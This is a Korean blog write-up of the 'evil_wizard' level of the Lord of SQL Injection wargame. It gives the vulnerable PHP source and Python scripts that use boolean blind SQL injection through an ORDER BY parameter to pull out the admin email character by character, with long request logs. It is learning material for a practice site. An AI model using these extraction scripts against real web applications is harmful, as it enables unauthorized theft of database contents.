Oh! JUN

[Lord Of SQL Injection] 24번(이전문제와 비슷하다) 본문

문제풀이/Lord of SQL Injection

[Lord Of SQL Injection] 24번(이전문제와 비슷하다)

Kwon Oh! JUN 2022. 2. 16. 01:17

query : select id,email,score from prob_evil_wizard where 1 order by

<?php
  include "./config.php";
  login_chk();
  $db dbconnect();
  if(preg_match('/prob|_|\.|proc|union|sleep|benchmark/i'$_GET[order])) exit("No Hack ~_~");
  $query "select id,email,score from prob_evil_wizard where 1 order by {$_GET[order]}"// same with hell_fire? really?
  echo "<table border=1><tr><th>id</th><th>email</th><th>score</th>";
  $rows mysqli_query($db,$query);
  while(($result mysqli_fetch_array($rows))){
    if($result['id'] == "admin"$result['email'] = "**************";
    echo "<tr><td>{$result[id]}</td><td>{$result[email]}</td><td>{$result[score]}</td></tr>";
  }
  echo "</table><hr>query : <strong>{$query}</strong><hr>";

  $_GET[email] = addslashes($_GET[email]);
  $query "select email from prob_evil_wizard where id='admin' and email='{$_GET[email]}'";
  $result = @mysqli_fetch_array(mysqli_query($db,$query));
  if(($result['email']) && ($result['email'] === $_GET['email'])) solve("evil_wizard");
  highlight_file(__FILE__);
?>

 

23번 문제랑 비슷하다. 

다른점이 있다면 이 문제에서는 sleep를 예외처리하고 있다는건데 23번 문제를 sleep 안써서 풀어서 이 문제도 풀이방식은 같다.

 

★ 패스워드 길이

import requests
from bs4 import BeautifulSoup

url = "https://los.rubiya.kr/chall/evil_wizard_32e3d35835aa4e039348712fb75169ad.php"
cookie = dict(PHPSESSID="o12akdcolfqtaeefahls72reg7")

for i in range(1, 100):
    param = "?order=length(email)="+str(i)+",id"
    len_result = url+param
    response = requests.get(len_result, cookies=cookie)
    view = BeautifulSoup(response.content, "html.parser")
    table = view.find_all('td')
    print(len_result)
    print(str(table)+"\n\n")
    
    if table[3].text == 'admin':
        print("패스워드 길이: "+str(i))
        break

이전 코드와 다른점이 있다면 이전 문제는 response.text.find() 임의로 위치를 맞춰서 했는데 이번거 풀어보니까 'admin'의 위치가 130에서 바껴서 131위치하고 있길래 어떻게 하면 자동화 시킬 수 있을까해서 BeautifulSoup 사용해서 테이블의 위치를 크롤링해서 파싱했다. 

 

.
.
.
https://los.rubiya.kr/chall/evil_wizard_32e3d35835aa4e039348712fb75169ad.php?order=length(email)=17,id
[<td>admin</td>, <td>**************</td>, <td>50</td>, <td>rubiya</td>, <td>rubiya805@gmail.com</td>, <td>100</td>]


https://los.rubiya.kr/chall/evil_wizard_32e3d35835aa4e039348712fb75169ad.php?order=length(email)=18,id
[<td>admin</td>, <td>**************</td>, <td>50</td>, <td>rubiya</td>, <td>rubiya805@gmail.com</td>, <td>100</td>]


https://los.rubiya.kr/chall/evil_wizard_32e3d35835aa4e039348712fb75169ad.php?order=length(email)=19,id
[<td>admin</td>, <td>**************</td>, <td>50</td>, <td>rubiya</td>, <td>rubiya805@gmail.com</td>, <td>100</td>]


https://los.rubiya.kr/chall/evil_wizard_32e3d35835aa4e039348712fb75169ad.php?order=length(email)=20,id
[<td>admin</td>, <td>**************</td>, <td>50</td>, <td>rubiya</td>, <td>rubiya805@gmail.com</td>, <td>100</td>]


https://los.rubiya.kr/chall/evil_wizard_32e3d35835aa4e039348712fb75169ad.php?order=length(email)=21,id
[<td>admin</td>, <td>**************</td>, <td>50</td>, <td>rubiya</td>, <td>rubiya805@gmail.com</td>, <td>100</td>]


https://los.rubiya.kr/chall/evil_wizard_32e3d35835aa4e039348712fb75169ad.php?order=length(email)=22,id
[<td>admin</td>, <td>**************</td>, <td>50</td>, <td>rubiya</td>, <td>rubiya805@gmail.com</td>, <td>100</td>]


https://los.rubiya.kr/chall/evil_wizard_32e3d35835aa4e039348712fb75169ad.php?order=length(email)=23,id
[<td>admin</td>, <td>**************</td>, <td>50</td>, <td>rubiya</td>, <td>rubiya805@gmail.com</td>, <td>100</td>]


https://los.rubiya.kr/chall/evil_wizard_32e3d35835aa4e039348712fb75169ad.php?order=length(email)=24,id
[<td>admin</td>, <td>**************</td>, <td>50</td>, <td>rubiya</td>, <td>rubiya805@gmail.com</td>, <td>100</td>]


https://los.rubiya.kr/chall/evil_wizard_32e3d35835aa4e039348712fb75169ad.php?order=length(email)=25,id
[<td>admin</td>, <td>**************</td>, <td>50</td>, <td>rubiya</td>, <td>rubiya805@gmail.com</td>, <td>100</td>]


https://los.rubiya.kr/chall/evil_wizard_32e3d35835aa4e039348712fb75169ad.php?order=length(email)=26,id
[<td>admin</td>, <td>**************</td>, <td>50</td>, <td>rubiya</td>, <td>rubiya805@gmail.com</td>, <td>100</td>]


https://los.rubiya.kr/chall/evil_wizard_32e3d35835aa4e039348712fb75169ad.php?order=length(email)=27,id
[<td>admin</td>, <td>**************</td>, <td>50</td>, <td>rubiya</td>, <td>rubiya805@gmail.com</td>, <td>100</td>]


https://los.rubiya.kr/chall/evil_wizard_32e3d35835aa4e039348712fb75169ad.php?order=length(email)=28,id
[<td>admin</td>, <td>**************</td>, <td>50</td>, <td>rubiya</td>, <td>rubiya805@gmail.com</td>, <td>100</td>]


https://los.rubiya.kr/chall/evil_wizard_32e3d35835aa4e039348712fb75169ad.php?order=length(email)=29,id
[<td>admin</td>, <td>**************</td>, <td>50</td>, <td>rubiya</td>, <td>rubiya805@gmail.com</td>, <td>100</td>]


https://los.rubiya.kr/chall/evil_wizard_32e3d35835aa4e039348712fb75169ad.php?order=length(email)=30,id
[<td>rubiya</td>, <td>rubiya805@gmail.com</td>, <td>100</td>, <td>admin</td>, <td>**************</td>, <td>50</td>]


패스워드 길이: 30

★ 패스워드

import requests
import string
from bs4 import BeautifulSoup


url = "https://los.rubiya.kr/chall/evil_wizard_32e3d35835aa4e039348712fb75169ad.php"
cookie = dict(PHPSESSID="o12akdcolfqtaeefahls72reg7")

asc = string.digits+string.ascii_letters+string.punctuation
print(asc)
result=""
count = 0
email = "rubiya805@gmail.cm"


for i in range(1,31):
    for j in asc:
        param = "?order=ord(right(left(email,"+str(i)+"),1))="+str(ord(j))+",id"
        res_url = url+param
        response = requests.get(res_url, cookies=cookie)
        
        view = BeautifulSoup(response.content, "html.parser")
        table = view.find_all('td')
        print(str(table)+"\n"+str(res_url))
        
        if table[3].text == 'admin':
            print(str(i)+"번째 패스워드 :"+j+"\n\n")
            result+=j
            count=0
            break

        count+=1
        print(str(count)+"\n\n")

        try:
            if count == len(asc):
                result+=email[i-1]
                print(str(i)+"번째 패스워드 :"+email[i-1]+"\n\n")
                count=0
        except IndexError:  
            result+=email[len(email)-1]    
            print(str(i)+"번째 패스워드 :"+email[len(email)-1]+"\n\n") 
            count=0
            
print("pw :"+result)
.
.
.
[<td>admin</td>, <td>**************</td>, <td>50</td>, <td>rubiya</td>, <td>rubiya805@gmail.com</td>, <td>100</td>]
https://los.rubiya.kr/chall/evil_wizard_32e3d35835aa4e039348712fb75169ad.php?order=ord(right(left(email,30),1))=61,id
81


[<td>admin</td>, <td>**************</td>, <td>50</td>, <td>rubiya</td>, <td>rubiya805@gmail.com</td>, <td>100</td>]
https://los.rubiya.kr/chall/evil_wizard_32e3d35835aa4e039348712fb75169ad.php?order=ord(right(left(email,30),1))=62,id
82


[<td>admin</td>, <td>**************</td>, <td>50</td>, <td>rubiya</td>, <td>rubiya805@gmail.com</td>, <td>100</td>]
https://los.rubiya.kr/chall/evil_wizard_32e3d35835aa4e039348712fb75169ad.php?order=ord(right(left(email,30),1))=63,id
83


[<td>admin</td>, <td>**************</td>, <td>50</td>, <td>rubiya</td>, <td>rubiya805@gmail.com</td>, <td>100</td>]
https://los.rubiya.kr/chall/evil_wizard_32e3d35835aa4e039348712fb75169ad.php?order=ord(right(left(email,30),1))=64,id
84


[<td>admin</td>, <td>**************</td>, <td>50</td>, <td>rubiya</td>, <td>rubiya805@gmail.com</td>, <td>100</td>]
https://los.rubiya.kr/chall/evil_wizard_32e3d35835aa4e039348712fb75169ad.php?order=ord(right(left(email,30),1))=91,id
85


[<td>admin</td>, <td>**************</td>, <td>50</td>, <td>rubiya</td>, <td>rubiya805@gmail.com</td>, <td>100</td>]
https://los.rubiya.kr/chall/evil_wizard_32e3d35835aa4e039348712fb75169ad.php?order=ord(right(left(email,30),1))=92,id
86


[<td>admin</td>, <td>**************</td>, <td>50</td>, <td>rubiya</td>, <td>rubiya805@gmail.com</td>, <td>100</td>]
https://los.rubiya.kr/chall/evil_wizard_32e3d35835aa4e039348712fb75169ad.php?order=ord(right(left(email,30),1))=93,id
87


[<td>admin</td>, <td>**************</td>, <td>50</td>, <td>rubiya</td>, <td>rubiya805@gmail.com</td>, <td>100</td>]
https://los.rubiya.kr/chall/evil_wizard_32e3d35835aa4e039348712fb75169ad.php?order=ord(right(left(email,30),1))=94,id
88


[<td>admin</td>, <td>**************</td>, <td>50</td>, <td>rubiya</td>, <td>rubiya805@gmail.com</td>, <td>100</td>]
https://los.rubiya.kr/chall/evil_wizard_32e3d35835aa4e039348712fb75169ad.php?order=ord(right(left(email,30),1))=95,id
89


[<td>admin</td>, <td>**************</td>, <td>50</td>, <td>rubiya</td>, <td>rubiya805@gmail.com</td>, <td>100</td>]
https://los.rubiya.kr/chall/evil_wizard_32e3d35835aa4e039348712fb75169ad.php?order=ord(right(left(email,30),1))=96,id
90


[<td>admin</td>, <td>**************</td>, <td>50</td>, <td>rubiya</td>, <td>rubiya805@gmail.com</td>, <td>100</td>]
https://los.rubiya.kr/chall/evil_wizard_32e3d35835aa4e039348712fb75169ad.php?order=ord(right(left(email,30),1))=123,id
91


[<td>admin</td>, <td>**************</td>, <td>50</td>, <td>rubiya</td>, <td>rubiya805@gmail.com</td>, <td>100</td>]
https://los.rubiya.kr/chall/evil_wizard_32e3d35835aa4e039348712fb75169ad.php?order=ord(right(left(email,30),1))=124,id
92


[<td>admin</td>, <td>**************</td>, <td>50</td>, <td>rubiya</td>, <td>rubiya805@gmail.com</td>, <td>100</td>]
https://los.rubiya.kr/chall/evil_wizard_32e3d35835aa4e039348712fb75169ad.php?order=ord(right(left(email,30),1))=125,id
93


[<td>admin</td>, <td>**************</td>, <td>50</td>, <td>rubiya</td>, <td>rubiya805@gmail.com</td>, <td>100</td>]
https://los.rubiya.kr/chall/evil_wizard_32e3d35835aa4e039348712fb75169ad.php?order=ord(right(left(email,30),1))=126,id
94


30번째 패스워드 :m


pw :aasup3r_secure_email@emai1.com

 

query : select id,email,score from prob_evil_wizard where 1 order by

EVIL_WIZARD Clear!


<?php
  include "./config.php";
  login_chk();
  $db dbconnect();
  if(preg_match('/prob|_|\.|proc|union|sleep|benchmark/i'$_GET[order])) exit("No Hack ~_~");
  $query "select id,email,score from prob_evil_wizard where 1 order by {$_GET[order]}"// same with hell_fire? really?
  echo "<table border=1><tr><th>id</th><th>email</th><th>score</th>";
  $rows mysqli_query($db,$query);
  while(($result mysqli_fetch_array($rows))){
    if($result['id'] == "admin"$result['email'] = "**************";
    echo "<tr><td>{$result[id]}</td><td>{$result[email]}</td><td>{$result[score]}</td></tr>";
  }
  echo "</table><hr>query : <strong>{$query}</strong><hr>";

  $_GET[email] = addslashes($_GET[email]);
  $query "select email from prob_evil_wizard where id='admin' and email='{$_GET[email]}'";
  $result = @mysqli_fetch_array(mysqli_query($db,$query));
  if(($result['email']) && ($result['email'] === $_GET['email'])) solve("evil_wizard");
  highlight_file(__FILE__);
?>

 

 23번 문제와 푸는 방법 똑같으니까 참고!!

https://securitystudy.tistory.com/42 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

'문제풀이 > Lord of SQL Injection' 카테고리의 다른 글

[Lord Of SQL Injection] 26번(%0a(엔터)로 뒤에 주석 무력화, 이진탐색)  (0) 2022.02.24
[Lord Of SQL Injection] N 25번(평문 → ASCII → hex)  (0) 2022.02.18
[Lord Of SQL Injection] 23번(order by 활용★★★★★)  (0) 2022.02.14
[Lord Of SQL Injection] 22번(error blind sql)  (0) 2022.02.13
[Lord Of SQL Injection] 21번(error blind sql)  (0) 2022.02.12
'문제풀이/Lord of SQL Injection' Related Articles more